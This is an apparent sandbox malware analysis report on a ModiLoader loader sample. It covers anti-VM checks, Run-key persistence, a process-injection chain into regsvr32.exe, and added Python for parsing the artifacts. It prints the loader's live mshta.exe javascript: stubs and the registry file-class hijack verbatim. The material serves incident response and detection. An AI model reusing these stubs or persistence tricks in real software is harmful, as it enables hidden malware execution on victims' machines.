Analysis

- max time kernel: 150s
- max time network: 150s
- platform: windows7_x64
- resource: win7-20240419-en
- resource tags: arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
- submitted: 08-05-2024 13:51
Static task: static1
Behavioral task: behavioral1
  Sample: 2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe
  Resource: win7-20240419-en
Behavioral task: behavioral2
  Sample: 2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe
  Resource: win10v2004-20240419-en

The signatures, memory dumps and process tree on this page come from behavioral1 (Windows 7 x64, win7-20240419-en); the Windows 10 run (behavioral2) is not shown here.
General

- Target: 2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe
- Size: 356KB
- MD5: 2523d4c29b570652b608f5026b3f068e
- SHA1: 3049ffc7f7ecc9a8f24fbd9b67a91ccd44821cef
- SHA256: 856c83e4bd9e463cfc0ee5ad88ad9e459a540db080630ea19b9de42926ba4f2a
- SHA512: f1abfe83f7ea506ad98391fff2f08cb22f71ee3717a6644cc78dc35152309a8cf44c753eaf5e984813e9290faba7f7721c3cfb7019daf594fa1c3d786403feda
- SSDEEP: 6144:5gb/TKVTqAJBfc3OfoaupVtN3AiD9C9uEGHKousVQIrwL4ONT+V7DM1AzzfRA273:ab/T6TqK9crpVPAiD9C9uEG7VxctVC7N
Malware Config: none extracted for this sample.
Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: mshta.exe
- description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process; pid: 2620; pid_target: 2672; process: mshta.exe

A child of WmiPrvSE.exe means the process-creation request arrived through WMI (typically a Win32_Process Create call) rather than a direct CreateProcess from the requester. This is why mshta.exe (PID 2620) appears at the top level of the process tree below with no parent link back to the sample, although it is the start of the injection chain.
Checks for common network interception software (1 TTP)
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Looks for VirtualBox Guest Additions in registry (2 TTPs, 1 IoC)
Processes: regsvr32.exe
- Key opened: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions (regsvr32.exe)

Looks for VirtualBox drivers on disk (2 TTPs, 1 IoC)
Processes: regsvr32.exe
- File opened (read-only): C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys (regsvr32.exe)
ModiLoader Second Stage (57 IoCs)
Processes: 1968 (the sample), 2248 powershell.exe, 2108 regsvr32.exe, 2188 regsvr32.exe
YARA rule modiloader_stage2 matched 57 behavioral1 memory dumps, named behavioral1/memory/<pid>-<index>-<start>-<end>-memory.dmp. Grouped by process and address range:
- PID 1968, 0x0000000000400000-0x0000000000460160: dumps 0, 4
- PID 1968, 0x00000000004E0000-0x00000000005BC000: dumps 2, 3, 5, 6, 7, 8, 9, 54
- PID 2248, 0x00000000057E0000-0x00000000058BC000: dumps 14, 18
- PID 2108, 0x0000000000270000-0x00000000003BA000: dumps 15, 16, 19 through 47, 52 (32 dumps)
- PID 2188, 0x00000000000D0000-0x000000000021A000: dumps 61 through 73 (13 dumps)

The same rule fires in every process along the chain recorded under SetThreadContext and WriteProcessMemory below (powershell.exe 2248 into regsvr32.exe 2108, then 2108 into 2188), and the region sizes line up: the 1968 and 2248 regions are both 0xDC000 bytes, the two regsvr32.exe regions are both 0x14A000 bytes. That is what a staged payload copied from host to host looks like. For triage, the 2108 and 2188 regions are the ones to pull, since they hold the second stage as written into the regsvr32.exe hosts.
Looks for VMWare Tools registry key (2 TTPs, 1 IoC)
Processes: regsvr32.exe
- Key opened: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools (regsvr32.exe)

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes: regsvr32.exe
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (regsvr32.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (regsvr32.exe)

Deletes itself (1 IoC)
Processes: regsvr32.exe
- pid 2108 regsvr32.exe

Adds Run key to start application (2 TTPs, 1 IoC)
Processes: regsvr32.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\cb8d1f\\a81118.bat\"" (regsvr32.exe)

The path ends in a bare backslash, so the command was written to the (Default) value of the Run key rather than to a named entry; a hunt query that lists only named values under Run will not show it. The target is a .bat file in a randomly named folder under AppData\Local.

Maps connected drives based on registry (3 TTPs, 2 IoCs)
Disk information is often read in order to detect sandboxing environments.
Processes: regsvr32.exe
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum (regsvr32.exe)
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 (regsvr32.exe)
Drops file in System32 directory (1 IoC)
Processes: powershell.exe
- File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)

Caveat: this is the Windows PowerShell Start Menu shortcut, with %ProgramData% left unexpanded, touched by powershell.exe on launch. It is a routine side effect of running PowerShell in this sandbox image and shows up with benign PowerShell use as well; do not treat it as a payload drop.

Suspicious use of SetThreadContext (2 IoCs)
Processes: powershell.exe, regsvr32.exe
- PID 2248 set thread context of 2108 (powershell.exe -> regsvr32.exe)
- PID 2108 set thread context of 2188 (regsvr32.exe -> regsvr32.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies Internet Explorer settings (2 IoCs)
Processes: regsvr32.exe
- Key created: \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\International (regsvr32.exe)
- Key created: \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl (regsvr32.exe)
Modifies registry class (7 IoCs)
Processes: regsvr32.exe
- Key created: \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.94e8bf0 (regsvr32.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.94e8bf0\ = "5d7e4d" (regsvr32.exe)
- Key created: \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d (regsvr32.exe)
- Key created: \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell (regsvr32.exe)
- Key created: \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell\open (regsvr32.exe)
- Key created: \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell\open\command (regsvr32.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:tF9In=\"jPn\";f8G=new ActiveXObject(\"WScript.Shell\");y40ydZj=\"hmfqG\";S4Z4aE=f8G.RegRead(\"HKCU\\\\software\\\\epsehio\\\\uqkiailgu\");t6c6Xw=\"Yu8FQ\";eval(S4Z4aE);X5FveniU=\"5ww\";\"" (regsvr32.exe)

Read together, these seven writes register a new file extension (.94e8bf0) under the user's HKCU\Software\Classes hive, point it at a ProgID (5d7e4d) and give that ProgID an open command of mshta.exe with a javascript: URI. The URI does not carry the payload; it creates WScript.Shell, reads HKCU\software\epsehio\uqkiailgu with RegRead and hands the result to eval(). Opening any file with the .94e8bf0 extension therefore re-launches the loader from a registry-resident script, which is why the value at HKCU\software\epsehio\uqkiailgu is the artifact to collect.
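The handler installed above and the mshta.exe command line in the process tree share one shape: an mshta.exe javascript: URI that reads a registry value through WScript.Shell.RegRead and passes the result to eval(). The following Python is an added example written for this page (not sandbox output and not the loader's own code). It parses both forms, resolves the .94e8bf0 -> 5d7e4d -> shell\open\command chain from the report's own rows, and extracts the registry value a responder should dump to recover the next stage. The two command lines and the two registry rows are copied from this report; the regular expressions, the Finding type and the function names are this example's own, and the report-unescaping step assumes the JSON-style escaping (\" and \\) shown on this page.

```python
"""Pull apart the mshta.exe 'javascript:' RegRead->eval handler this loader
plants, and resolve the file-class hijack that launches it.

Added example for this report; not sandbox output or loader code. The command
lines and registry rows are copied from the report, all parsing is ours."""
import re
from dataclasses import dataclass
from urllib.parse import unquote

# mshta command line as shown in the process tree (spaces URL-encoded).
TREE_CMDLINE = (r'"C:\Windows\system32\mshta.exe" javascript:evu7Uft="uQfdRv";'
                r'n34M=new%20ActiveXObject("WScript.Shell");rs3bwfqN="O";'
                r'Lv74qy=n34M.RegRead("HKCU\\software\\B8HhGcjCN\\NI8xZRGM");'
                r'QcY0x2uE="UPhI";eval(Lv74qy);Qa82xtZKR="f";')

# shell\open\command value as displayed by the report (\" quote, \\ backslash).
CLASS_CMD_DISPLAY = (r'\"C:\\Windows\\system32\\mshta.exe\" \"javascript:tF9In=\"jPn\";'
                     r'f8G=new ActiveXObject(\"WScript.Shell\");y40ydZj=\"hmfqG\";'
                     r'S4Z4aE=f8G.RegRead(\"HKCU\\\\software\\\\epsehio\\\\uqkiailgu\");'
                     r't6c6Xw=\"Yu8FQ\";eval(S4Z4aE);X5FveniU=\"5ww\";\"')

CLASS_ROWS = [  # the two "Set value (str)" rows from the report
    r'Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.94e8bf0\ = "5d7e4d"',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell\open\command\ = "'
    + CLASS_CMD_DISPLAY + '"',
]

MSHTA_RE = re.compile(r'mshta(?:\.exe)?"?\s+"?javascript:', re.IGNORECASE)
# <var> = <obj>.RegRead("<js string literal>")
REGREAD_RE = re.compile(r'([A-Za-z_$][\w$]*)\s*=\s*[A-Za-z_$][\w$]*\.RegRead\(\s*"((?:[^"\\]|\\.)*)"\s*\)')
EVAL_RE = re.compile(r'\beval\s*\(\s*([A-Za-z_$][\w$]*)\s*\)')
EXT_RE = re.compile(r'_CLASSES\\(\.[^\\]+)\\ = "([^"]+)"')          # .ext -> ProgID
OPENCMD_RE = re.compile(r'_CLASSES\\([^\\]+)\\shell\\open\\command\\ = "(.*)"$')


@dataclass
class Finding:
    key_path: str   # HKCU\... value the script reads, JS-unescaped
    eval_var: str   # identifier handed to eval()
    chained: bool   # eval() consumes exactly what RegRead() returned


def unescape_report_value(s: str) -> str:
    """Undo the report's display escaping. Registry strings only; raw process
    command lines are not escaped and must not go through this."""
    return s.replace('\\"', '"').replace('\\\\', '\\')


def js_unescape(lit: str) -> str:
    """Enough JS string-literal decoding for these loaders: backslash-x -> x."""
    return re.sub(r'\\(.)', r'\1', lit)


def analyse_mshta_cmdline(cmdline: str, from_registry: bool = False):
    """Return a Finding for a RegRead->eval mshta one-liner, else None."""
    if from_registry:
        cmdline = unescape_report_value(cmdline)
    cmdline = unquote(cmdline)               # new%20ActiveXObject -> new ActiveXObject
    if not MSHTA_RE.search(cmdline):
        return None
    m_read, m_eval = REGREAD_RE.search(cmdline), EVAL_RE.search(cmdline)
    if not (m_read and m_eval):
        return None
    return Finding(key_path=js_unescape(m_read.group(2)),
                   eval_var=m_eval.group(1),
                   chained=m_read.group(1) == m_eval.group(1))


def split_value(key_path: str):
    """WScript.Shell.RegRead reads a named value unless the path ends in a
    backslash, in which case it reads the key's default value."""
    if key_path.endswith('\\'):
        return key_path.rstrip('\\'), ''
    key, _, name = key_path.rpartition('\\')
    return key, name


def resolve_class_hijack(rows):
    """Chain .ext -> ProgID -> shell\\open\\command over the report's rows and
    analyse each resulting command. Returns {ext: Finding or None}."""
    ext_to_progid, progid_to_cmd = {}, {}
    for row in rows:
        m_ext, m_cmd = EXT_RE.search(row), OPENCMD_RE.search(row)
        if m_ext:
            ext_to_progid[m_ext.group(1)] = m_ext.group(2)
        elif m_cmd:
            progid_to_cmd[m_cmd.group(1)] = m_cmd.group(2)
    return {ext: analyse_mshta_cmdline(progid_to_cmd[pid], from_registry=True)
            for ext, pid in ext_to_progid.items() if pid in progid_to_cmd}


if __name__ == "__main__":
    print(analyse_mshta_cmdline(TREE_CMDLINE))
    for ext, f in resolve_class_hijack(CLASS_ROWS).items():
        print(ext, "->", f, "; reg value to dump:", split_value(f.key_path))
```

The two forms need different pre-processing: the process-tree command line is URL-encoded (new%20ActiveXObject) but otherwise literal, while the registry value is shown with the report's escaping on top of the JavaScript string escaping, so it is unescaped once for the report and once more for the JS literal before the key path is usable in a reg query.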
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: powershell.exe, regsvr32.exe
- 2248 powershell.exe (4 events)
- 2108 regsvr32.exe (60 events)

Suspicious behavior: MapViewOfSection (2 IoCs)
Processes: powershell.exe, regsvr32.exe
- 2248 powershell.exe
- 2108 regsvr32.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes: powershell.exe
- Token: SeDebugPrivilege, 2248 powershell.exe

Suspicious use of WriteProcessMemory (20 IoCs)
Processes: mshta.exe, powershell.exe, regsvr32.exe
- PID 2620 mshta.exe wrote to memory of 2248 powershell.exe (4 events)
- PID 2248 powershell.exe wrote to memory of 2108 regsvr32.exe (8 events)
- PID 2108 regsvr32.exe wrote to memory of 2188 regsvr32.exe (8 events)
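The WriteProcessMemory and SetThreadContext rows in this report are flattened, one row per event, which hides the chain they describe. The following Python is an added example for this page (not sandbox output and not the loader's code) that parses those rows, collapses repeats into per-hop counts, labels each hop by its API mix and walks the chain from the one process nobody wrote into. ROWS reproduces the report's rows, using list multiplication for the repeated ones; the row regex, the hop labels and the helper names are this example's own.

```python
"""Rebuild the injection chain from a sandbox report's flattened
WriteProcessMemory / SetThreadContext rows.

Added example for this report; not sandbox output or loader code. ROWS is the
report's own rows (identical rows repeat once per event); parsing is ours."""
import re
from collections import Counter, defaultdict

# Row layout in the report: "PID <src> <verb> <dst> <src> <src image> <dst image>"
ROW_RE = re.compile(
    r'PID (\d+) (wrote to memory of|set thread context of) (\d+) \d+ (\S+) (\S+)')

ROWS = (
    ["PID 2620 wrote to memory of 2248 2620 mshta.exe powershell.exe"] * 4
    + ["PID 2248 wrote to memory of 2108 2248 powershell.exe regsvr32.exe"] * 8
    + ["PID 2108 wrote to memory of 2188 2108 regsvr32.exe regsvr32.exe"] * 8
    + ["PID 2248 set thread context of 2108 2248 powershell.exe regsvr32.exe",
       "PID 2108 set thread context of 2188 2108 regsvr32.exe regsvr32.exe"]
)

API = {"wrote to memory of": "WriteProcessMemory",
       "set thread context of": "SetThreadContext"}


def parse_rows(rows):
    """Return ({(src_pid, dst_pid): Counter(api -> events)}, {pid: image})."""
    edges, images = defaultdict(Counter), {}
    for row in rows:
        m = ROW_RE.search(row)
        if not m:
            continue                       # not an injection row; skip it
        src, verb, dst, src_img, dst_img = m.groups()
        src, dst = int(src), int(dst)
        images[src], images[dst] = src_img, dst_img
        edges[(src, dst)][API[verb]] += 1
    return edges, images


def classify(apis):
    """Label a hop by its API mix. A write followed by a thread-context change
    is the hollowing / thread-hijack pattern; a write on its own also happens
    routinely when a parent creates a child, so alone it is weaker evidence."""
    if apis["WriteProcessMemory"] and apis["SetThreadContext"]:
        return "write + SetThreadContext (hollowing-style injection)"
    if apis["WriteProcessMemory"]:
        return "write only (process creation or staging)"
    return "SetThreadContext only"


def chains(edges, images):
    """Walk from the roots (processes nobody wrote into) along the edges.
    This report's chain is linear; a branching tree is flattened depth-first."""
    children = defaultdict(list)
    for src, dst in edges:
        children[src].append(dst)
    targets = {dst for _, dst in edges}
    roots = sorted({src for src, _ in edges if src not in targets})

    def walk(pid):
        path = [f"{images[pid]}({pid})"]
        for nxt in sorted(set(children[pid])):
            path.extend(walk(nxt))
        return path

    return [walk(r) for r in roots]


def summarise(rows):
    """One line per hop, plus the reconstructed chain(s)."""
    edges, images = parse_rows(rows)
    hops = [f"{images[s]}({s}) -> {images[d]}({d}): {dict(apis)} => {classify(apis)}"
            for (s, d), apis in sorted(edges.items())]
    return hops, chains(edges, images)


if __name__ == "__main__":
    hops, chain_list = summarise(ROWS)
    print("\n".join(hops))
    for chain in chain_list:
        print(" -> ".join(chain))
```

On this report the walk yields mshta.exe(2620) -> powershell.exe(2248) -> regsvr32.exe(2108) -> regsvr32.exe(2188), with the two regsvr32.exe hops carrying both APIs and the mshta.exe -> powershell.exe hop carrying writes only, which is consistent with mshta.exe merely launching PowerShell and PowerShell doing the first real injection.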
Processes

- C:\Users\Admin\AppData\Local\Temp\2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe (depth 1, PID 1968)
  command line: "C:\Users\Admin\AppData\Local\Temp\2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe"
- C:\Windows\system32\mshta.exe (depth 1, PID 2620)
  command line: "C:\Windows\system32\mshta.exe" javascript:evu7Uft="uQfdRv";n34M=new%20ActiveXObject("WScript.Shell");rs3bwfqN="O";Lv74qy=n34M.RegRead("HKCU\\software\\B8HhGcjCN\\NI8xZRGM");QcY0x2uE="UPhI";eval(Lv74qy);Qa82xtZKR="f";
  signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 2248)
    command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:swjn
    signatures: Drops file in System32 directory; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\regsvr32.exe (depth 3, PID 2108)
      command line: regsvr32.exe
      signatures: Looks for VirtualBox Guest Additions in registry; Looks for VirtualBox drivers on disk; Looks for VMWare Tools registry key; Checks BIOS information in registry; Deletes itself; Adds Run key to start application; Maps connected drives based on registry; Suspicious use of SetThreadContext; Modifies Internet Explorer settings; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\regsvr32.exe (depth 4, PID 2188)
        command line: "C:\Windows\SysWOW64\regsvr32.exe"

Reading the tree:
- mshta.exe (PID 2620) sits at depth 1 next to the sample with no parent link. Together with the "unexpected child process" signature that names wmiprvse.exe as its parent, this says the launch went through WMI, so a plain parent/child view will not tie mshta.exe back to the sample (PID 1968).
- The mshta.exe javascript: URI pulls its code out of HKCU\software\B8HhGcjCN\NI8xZRGM with WScript.Shell.RegRead and eval()s it; the command line holds the retrieval stub only, not the payload.
- powershell.exe runs "iex $env:swjn": the script is passed in the environment variable swjn inherited from mshta.exe, so it has to be recovered from the process environment block or from PowerShell script block logging, not from the command line.
- Both regsvr32.exe instances start with no DLL argument (command lines "regsvr32.exe" and "C:\Windows\SysWOW64\regsvr32.exe") and then receive WriteProcessMemory and SetThreadContext from their parents. An argument-less regsvr32.exe spawned by powershell.exe has no legitimate purpose and is a high-signal hunt lead on its own.
Network

No network events are listed in this report. The family description above expects a download from a cloud service, and regsvr32.exe ran VirtualBox, VMware and BIOS checks during the run, so the absence of traffic in a 150s window says nothing about whether the download stage works outside a sandbox.
MITRE ATT&CK Enterprise v15

Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
Downloads

Three artifacts are offered for download; the report identifies them only by size and hash.

- Filesize: 68KB
  MD5: 29f65ba8e88c063813cc50a4ea544e93
  SHA1: 05a7040d5c127e68c25d81cc51271ffb8bef3568
  SHA256: 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
  SHA512: e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
- Filesize: 15KB
  MD5: 2949ce78f2b9e4f3b4e7cbd582776bc7
  SHA1: cc8f62b150f399561dbdf6af7fda2c1d05be3dbf
  SHA256: 728c1f732efce403a0d343bb68f0f94e940d3fa24a5c319f415166a8b1f3ef8d
  SHA512: a5bdd32ec3c72a616036a0b26a8a9ba7e3762196aba86bcb7d19119388b71cca72eb957e3845298fcb01d709f126478a5bc677959dac0debec88ebfdbe43abf9
- Filesize: 71B
  MD5: 16c3800e39ce58c64e26b06547058a41
  SHA1: 272c42f839cc8b74fcf517257bc8deb50d383770
  SHA256: 2f34841c53225d8a1cd6a9541b657ddbdd31c9f17ed3e76beef32bad16391339
  SHA512: fe7c7cfd073723fd52a0603caf9f31064b24a1360c26cf673eb7fb0fd643b859a49dd68d3701f71d083513a9895c622fa5df3fbbae1d008c38bb28265d176699